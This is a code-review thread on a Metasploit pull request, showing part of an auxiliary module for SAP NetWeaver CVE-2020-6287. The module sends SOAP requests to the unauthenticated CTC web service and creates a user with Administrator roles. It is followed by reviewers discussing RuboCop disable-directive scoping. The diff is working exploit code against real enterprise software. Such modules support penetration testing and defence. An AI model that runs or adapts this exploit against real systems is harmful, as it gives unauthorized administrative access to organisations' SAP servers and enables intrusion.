modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb

```diff
@@ -0,0 +1,248 @@
+          </SAP_XI_PCK_COMMUNICATION>
+          <SAP_XI_PCK_MONITOR>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_MONITOR>
+          <SAP_XI_PCK_ADMIN>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_ADMIN>
+          <PCKUser>
+            <userName>#{datastore['USERNAME'].encode(xml: :text)}</userName>
+            <password secure="true">#{datastore['PASSWORD'].encode(xml: :text)}</password>
+          </PCKUser>
+          <PCKReceiver>
+            <userName>pckreceiver2</userName>
+            <password secure="true">Password1</password>
+          </PCKReceiver>
+          <PCKMonitor>
+            <userName>pckmonitor2</userName>
+            <password secure="true">Password1</password>
+          </PCKMonitor>
+          <PCKAdmin>
+            <userName>pckadmin2</userName>
+            <password secure="true">Password1</password>
+          </PCKAdmin>
+        </Usermanagement>
+      </PCK>
+    ENVELOPE
+
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+        <soapenv:Header/>
+        <soapenv:Body>
+          <urn:execute>
+              <identifier>
+                <component>sap.com/tc~lm~config~content</component>
+                <path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path>
+             </identifier>
+             <contextMessages>
+                <baData>#{Rex::Text.encode_base64(message[:data])}</baData>
+                <name>#{message[:name]}</name>
+             </contextMessages>
+          </urn:execute>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to start the PCK Upgrade process') unless res&.code == 200
+
+    session_id = res.get_xml_document.xpath('//return/text()').to_s
+    WebServiceJob.new(self, session_id)
+  end
+end
+
+class WebServiceJob
+  def initialize(mod, session_id)
+    @mod = mod
+    @session_id = session_id
+  end
+
+  def cancel_execution
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:cancelExecution>
+               <sessionId>#{@session_id.encode(xml: :text)}</sessionId>
+            </urn:cancelExecution>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to cancel execution') if res.nil?
+
+    res.get_xml_document.xpath('//return/text()').to_s != 'false'
+  end
+
+  def get_event # rubocop:disable Naming/AccessorMethodName
```

Comment:
It is desirable to reenable temporarily disabled cops:

https://github.com/rapid7/metasploit-framework/blob/613c37f9d81ec0a7b5eb586af7c483826316b7cd/lib/msf/core/exploit/zeromq.rb#L136-L138

Not gonna push hard on this, but if we use this to make future CI exceptions, we should be consistent about it.

Reply:
@zeroSteiner pointed out to me that he thinks the inline comment disables cop(s) for just that line.

Reply:
Verified that @zeroSteiner's assumption is correct:

```
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$ cat test.rb
s = 'puts RUBY_VERSION'
eval(s) # rubocop:disable Security/Eval
eval(s)
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$ rubocop test.rb
.rubocop.yml: Metrics/LineLength has the wrong namespace - should be Layout
/rapid7/metasploit-framework/.rubocop.yml: Warning: no department given for Documentation.
The following cops were added to RuboCop, but are not configured. Please set Enabled to either `true` or `false` in your `.rubocop.yml` file:
 - Layout/EmptyLinesAroundAttributeAccessor (0.83)
 - Layout/SpaceAroundMethodCallOperator (0.82)
 - Lint/DeprecatedOpenSSLConstant (0.84)
 - Lint/MixedRegexpCaptureTypes (0.85)
 - Lint/RaiseException (0.81)
 - Lint/StructNewOverride (0.81)
 - Style/AccessorGrouping (0.87)
 - Style/BisectedAttrAccessor (0.87)
 - Style/ExponentialNotation (0.82)
 - Style/HashEachMethods (0.80)
 - Style/HashTransformKeys (0.80)
 - Style/HashTransformValues (0.80)
 - Style/RedundantAssignment (0.87)
 - Style/RedundantFetchBlock (0.86)
 - Style/RedundantRegexpCharacterClass (0.85)
 - Style/RedundantRegexpEscape (0.85)
 - Style/SlicingWithRange (0.83)
For more information: https://docs.rubocop.org/rubocop/versioning.html
Inspecting 1 file
C

Offenses:

test.rb:3:1: C: Security/Eval: The use of eval is a serious security risk.
eval(s)
^^^^

1 file inspected, 1 offense detected
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$
```

Reply:
```
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$ cat test.rb
s = 'puts RUBY_VERSION'
# rubocop:disable Security/Eval
eval(s)
eval(s)
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$ rubocop test.rb
.rubocop.yml: Metrics/LineLength has the wrong namespace - should be Layout
/rapid7/metasploit-framework/.rubocop.yml: Warning: no department given for Documentation.
The following cops were added to RuboCop, but are not configured. Please set Enabled to either `true` or `false` in your `.rubocop.yml` file:
 - Layout/EmptyLinesAroundAttributeAccessor (0.83)
 - Layout/SpaceAroundMethodCallOperator (0.82)
 - Lint/DeprecatedOpenSSLConstant (0.84)
 - Lint/MixedRegexpCaptureTypes (0.85)
 - Lint/RaiseException (0.81)
 - Lint/StructNewOverride (0.81)
 - Style/AccessorGrouping (0.87)
 - Style/BisectedAttrAccessor (0.87)
 - Style/ExponentialNotation (0.82)
 - Style/HashEachMethods (0.80)
 - Style/HashTransformKeys (0.80)
 - Style/HashTransformValues (0.80)
 - Style/RedundantAssignment (0.87)
 - Style/RedundantFetchBlock (0.86)
 - Style/RedundantRegexpCharacterClass (0.85)
 - Style/RedundantRegexpEscape (0.85)
 - Style/SlicingWithRange (0.83)
For more information: https://docs.rubocop.org/rubocop/versioning.html
Inspecting 1 file
W

Offenses:

test.rb:2:1: W: Lint/MissingCopEnableDirective: Re-enable Security/Eval cop with # rubocop:enable after disabling it.
# rubocop:disable Security/Eval
^

1 file inspected, 1 offense detected
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$
```

Reply:
Makes sense. TIL. Thanks! I think I used separate comments because of the total line length. Silly. (: